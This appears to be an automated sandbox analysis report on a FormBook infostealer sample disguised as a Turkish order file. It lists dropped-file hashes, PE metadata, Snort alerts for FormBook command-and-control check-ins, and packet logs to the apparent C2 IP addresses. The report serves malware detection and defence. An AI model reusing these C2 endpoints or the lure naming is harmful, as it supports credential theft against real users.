Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
MD5:	92C17FC0DE8449D1E50ED56DBEBAA35D
SHA1:	A617D392757DC7B1BEF28448B72CBD131CF4D0FB
SHA-256:	DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
SHA-512:	603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\7454168B

Download File

Process:	C:\Windows\SysWOW64\unregmp2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt4ezjzt.bti.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sixvkcea.rxc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjlksn2r.tgk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpimaqpi.vkv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.883270399295973
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
File size:	800'256 bytes
MD5:	0a4b0ad0f1b172acacb64b09cf6e4277
SHA1:	4d9861a209f9a4f0eae42b5d4290a9f1079fbeb3
SHA256:	6e96f02123bda97a2255ac99a19e72e477237ecfd69755dc042f243affd34af4
SHA512:	eebee09524f5a4307e7d4bfcd88aa2301a24c726779d64af610fd294a96d963267266a0c5024932f105c7355304103f6e7df46336a66c14f781cc8f72ecacdfd
SSDEEP:	12288:uuH6JNf+w5TZ5kwf4f/UaQWcpfKa3WwtCJNGEzHmRFMgkbwjZPs6WmCW6:SJTTZ5kuh1CJVGR6gwwa3z
TLSH:	1105123811988E7AE55E0B3EE1E9461427F8F10A3143F70E6EE450D90DA77D59A3728F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......6........... ... ....@.. ....................................@................................

File Icon


Icon Hash:	2749a4a6b8e4570b

Static PE Info

General

Entrypoint:	0x4c1d8a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6684DCEC [Wed Jul 3 05:09:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add eax, dword ptr [eax]
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add eax, 06000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc1d38	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x3394	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbfdb0	0xbfe00	369902f4f89c4eb609eab64fa4be026c	False	0.9115495215798045	data	7.888152463098512	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x3394	0x3400	60fbf012bd2355bc391680ae3db64744	False	0.9212740384615384	data	7.756447636891224	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	3b404804e85738abce06233e0ec4ad3a	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc20c8	0x2f27	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9724132217711872
RT_GROUP_ICON	0xc5000	0x14	data	1.05
RT_VERSION	0xc5024	0x36a	data	0.43363844393592677

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/03/24-08:34:30.392510	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61434	80	192.168.2.8	91.195.240.19
07/03/24-08:34:38.210601	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61437	80	192.168.2.8	91.195.240.19
07/03/24-08:35:53.290265	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61451	80	192.168.2.8	203.161.49.220
07/03/24-08:35:17.331293	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61443	80	192.168.2.8	91.195.240.19
07/03/24-08:37:10.466626	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61470	80	192.168.2.8	66.235.200.146
07/03/24-08:35:36.240629	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61446	80	192.168.2.8	109.95.158.122
07/03/24-08:35:44.422597	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61449	80	192.168.2.8	109.95.158.122
07/03/24-08:36:56.027283	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61467	80	192.168.2.8	208.91.197.27
07/03/24-08:36:42.274563	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61463	80	192.168.2.8	47.239.13.172
07/03/24-08:36:17.634122	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61458	80	192.168.2.8	91.195.240.19
07/03/24-08:37:01.089769	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61469	80	192.168.2.8	208.91.197.27
07/03/24-08:33:56.148224	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61430	80	192.168.2.8	103.197.25.241
07/03/24-08:36:53.486013	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61466	80	192.168.2.8	208.91.197.27
07/03/24-08:34:32.929575	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61435	80	192.168.2.8	91.195.240.19
07/03/24-08:36:47.337864	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61465	80	192.168.2.8	47.239.13.172
07/03/24-08:34:54.558535	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61439	80	192.168.2.8	212.227.172.254
07/03/24-08:36:39.734472	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61462	80	192.168.2.8	47.239.13.172
07/03/24-08:34:03.758043	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61433	80	192.168.2.8	103.197.25.241
07/03/24-08:36:06.852665	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61455	80	192.168.2.8	35.227.248.111
07/03/24-08:35:50.761028	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61450	80	192.168.2.8	203.161.49.220
07/03/24-08:36:20.164223	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61459	80	192.168.2.8	91.195.240.19
07/03/24-08:35:58.358637	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61453	80	192.168.2.8	203.161.49.220
07/03/24-08:36:25.248489	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61461	80	192.168.2.8	91.195.240.19
07/03/24-08:35:14.452619	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61442	80	192.168.2.8	91.195.240.19
07/03/24-08:36:04.314574	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61454	80	192.168.2.8	35.227.248.111
07/03/24-08:35:22.399810	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61445	80	192.168.2.8	91.195.240.19
07/03/24-08:33:40.563094	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61426	80	192.168.2.8	23.111.180.146
07/03/24-08:34:52.027029	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61438	80	192.168.2.8	212.227.172.254
07/03/24-08:36:11.915972	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61457	80	192.168.2.8	35.227.248.111
07/03/24-08:33:58.690691	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61431	80	192.168.2.8	103.197.25.241
07/03/24-08:35:00.489221	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	61441	80	192.168.2.8	212.227.172.254
07/03/24-08:37:13.726579	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61471	80	192.168.2.8	66.235.200.146
07/03/24-08:35:38.778768	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	61447	80	192.168.2.8	109.95.158.122

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 08:33:40.555473089 CEST	61426	80	192.168.2.8	23.111.180.146
Jul 3, 2024 08:33:40.560533047 CEST	80	61426	23.111.180.146	192.168.2.8
Jul 3, 2024 08:33:40.560617924 CEST	61426	80	192.168.2.8	23.111.180.146
Jul 3, 2024 08:33:40.563093901 CEST	61426	80	192.168.2.8	23.111.180.146
Jul 3, 2024 08:33:40.567934990 CEST	80	61426	23.111.180.146	192.168.2.8
Jul 3, 2024 08:33:41.084490061 CEST	80	61426	23.111.180.146	192.168.2.8
Jul 3, 2024 08:33:41.084589958 CEST	80	61426	23.111.180.146	192.168.2.8
Jul 3, 2024 08:33:41.084645987 CEST	61426	80	192.168.2.8	23.111.180.146
Jul 3, 2024 08:33:41.088002920 CEST	61426	80	192.168.2.8	23.111.180.146
Jul 3, 2024 08:33:41.092886925 CEST	80	61426	23.111.180.146	192.168.2.8
Jul 3, 2024 08:33:56.141340017 CEST	61430	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:33:56.146372080 CEST	80	61430	103.197.25.241	192.168.2.8
Jul 3, 2024 08:33:56.146471024 CEST	61430	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:33:56.148224115 CEST	61430	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:33:56.153130054 CEST	80	61430	103.197.25.241	192.168.2.8
Jul 3, 2024 08:33:57.654541969 CEST	61430	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:33:57.699779034 CEST	80	61430	103.197.25.241	192.168.2.8
Jul 3, 2024 08:33:58.683640003 CEST	61431	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:33:58.688631058 CEST	80	61431	103.197.25.241	192.168.2.8
Jul 3, 2024 08:33:58.688730955 CEST	61431	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:33:58.690690994 CEST	61431	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:33:58.695497036 CEST	80	61431	103.197.25.241	192.168.2.8
Jul 3, 2024 08:33:59.767225981 CEST	80	61430	103.197.25.241	192.168.2.8
Jul 3, 2024 08:33:59.767288923 CEST	61430	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:00.201246023 CEST	61431	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:00.247747898 CEST	80	61431	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:01.220046997 CEST	61432	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:01.225102901 CEST	80	61432	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:01.225194931 CEST	61432	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:01.227083921 CEST	61432	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:01.231951952 CEST	80	61432	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:01.232039928 CEST	80	61432	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:02.732439041 CEST	61432	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:02.737618923 CEST	80	61432	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:02.737703085 CEST	61432	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:03.750786066 CEST	61433	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:03.755902052 CEST	80	61433	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:03.755966902 CEST	61433	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:03.758043051 CEST	61433	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:03.762870073 CEST	80	61433	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:20.044776917 CEST	80	61431	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:20.044956923 CEST	61431	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:25.142328024 CEST	80	61433	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:25.142504930 CEST	61433	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:25.143409014 CEST	61433	80	192.168.2.8	103.197.25.241
Jul 3, 2024 08:34:25.148533106 CEST	80	61433	103.197.25.241	192.168.2.8
Jul 3, 2024 08:34:30.385313988 CEST	61434	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:30.390141964 CEST	80	61434	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:30.390214920 CEST	61434	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:30.392509937 CEST	61434	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:30.397347927 CEST	80	61434	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:31.062623978 CEST	80	61434	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:31.062738895 CEST	80	61434	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:31.062913895 CEST	61434	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:31.904412985 CEST	61434	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:32.922753096 CEST	61435	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:32.927723885 CEST	80	61435	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:32.927839041 CEST	61435	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:32.929574966 CEST	61435	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:32.934427977 CEST	80	61435	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:33.583518028 CEST	80	61435	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:33.583544970 CEST	80	61435	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:33.583707094 CEST	61435	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:34.435771942 CEST	61435	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:35.454200983 CEST	61436	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:35.592178106 CEST	80	61436	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:35.592291117 CEST	61436	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:35.594430923 CEST	61436	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:35.600013018 CEST	80	61436	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:35.600024939 CEST	80	61436	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:36.251281023 CEST	80	61436	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:36.251306057 CEST	80	61436	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:36.251370907 CEST	61436	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:37.107486010 CEST	61436	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:38.126055956 CEST	61437	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:38.204765081 CEST	80	61437	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:38.205245018 CEST	61437	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:38.210601091 CEST	61437	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:38.215440035 CEST	80	61437	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:38.841934919 CEST	80	61437	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:38.841953993 CEST	80	61437	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:38.842171907 CEST	61437	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:38.844667912 CEST	61437	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:34:38.849550962 CEST	80	61437	91.195.240.19	192.168.2.8
Jul 3, 2024 08:34:52.017256975 CEST	61438	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:52.022296906 CEST	80	61438	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:52.022424936 CEST	61438	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:52.027029037 CEST	61438	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:52.038563967 CEST	80	61438	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:52.650649071 CEST	80	61438	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:52.650945902 CEST	80	61438	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:52.652566910 CEST	61438	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:53.529794931 CEST	61438	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:54.547811031 CEST	61439	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:54.555125952 CEST	80	61439	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:54.556690931 CEST	61439	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:54.558535099 CEST	61439	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:54.565990925 CEST	80	61439	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:55.202064037 CEST	80	61439	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:55.202182055 CEST	80	61439	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:55.202246904 CEST	61439	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:56.060640097 CEST	61439	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:57.080580950 CEST	61440	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:57.391439915 CEST	80	61440	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:57.391521931 CEST	61440	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:57.393690109 CEST	61440	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:57.398576021 CEST	80	61440	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:57.398711920 CEST	80	61440	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:58.028501034 CEST	80	61440	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:58.028536081 CEST	80	61440	212.227.172.254	192.168.2.8
Jul 3, 2024 08:34:58.028580904 CEST	61440	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:58.904398918 CEST	61440	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:34:59.924122095 CEST	61441	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:35:00.487039089 CEST	80	61441	212.227.172.254	192.168.2.8
Jul 3, 2024 08:35:00.487272978 CEST	61441	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:35:00.489221096 CEST	61441	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:35:00.494142056 CEST	80	61441	212.227.172.254	192.168.2.8
Jul 3, 2024 08:35:01.113575935 CEST	80	61441	212.227.172.254	192.168.2.8
Jul 3, 2024 08:35:01.113920927 CEST	80	61441	212.227.172.254	192.168.2.8
